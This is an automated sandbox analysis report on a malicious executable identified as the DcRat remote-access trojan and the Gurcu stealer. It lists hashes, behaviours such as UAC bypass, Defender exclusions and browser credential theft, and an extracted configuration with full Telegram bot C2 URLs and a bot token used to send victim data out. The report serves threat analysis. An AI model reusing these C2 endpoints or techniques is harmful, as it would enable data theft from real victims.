Resubmissions

23-10-2024 02:31

241023-czs5ssydnj 10

23-10-2024 02:28

241023-cygelsxakf 10

General

  • Target

    PedikClient.exe

  • Size

    1.7MB

  • Sample

    241023-cygelsxakf

  • MD5

    28d6347c722e5cac5ae9245b16d4754c

  • SHA1

    45a79b7368ec79516ab1772188bec1b36c43d498

  • SHA256

    eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1

  • SHA512

    643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181

  • SSDEEP

    49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendPhoto?chat_id=7706607495&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%E2%80%A2%20Comment%3A%20Arbuzik%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20RPHBTALT%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20138.199.29.44%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CGoogle%5Cdwm.ex

https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendDocument?chat_id=7706607495&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.371713

Targets

    • Target

      PedikClient.exe

    • Size

      1.7MB

    • MD5

      28d6347c722e5cac5ae9245b16d4754c

    • SHA1

      45a79b7368ec79516ab1772188bec1b36c43d498

    • SHA256

      eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1

    • SHA512

      643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181

    • SSDEEP

      49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15

    • DcRat

      DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    • Gurcu, WhiteSnake

      Gurcu is a malware stealer written in C#.

    • Modifies WinLogon for persistence

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • UAC bypass

    • DCRat payload

      Detects payload of DCRat, commonly dropped by NSIS installers.

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Disables Task Manager via registry modification

    • Modifies Windows Firewall

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Checks whether UAC is enabled

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks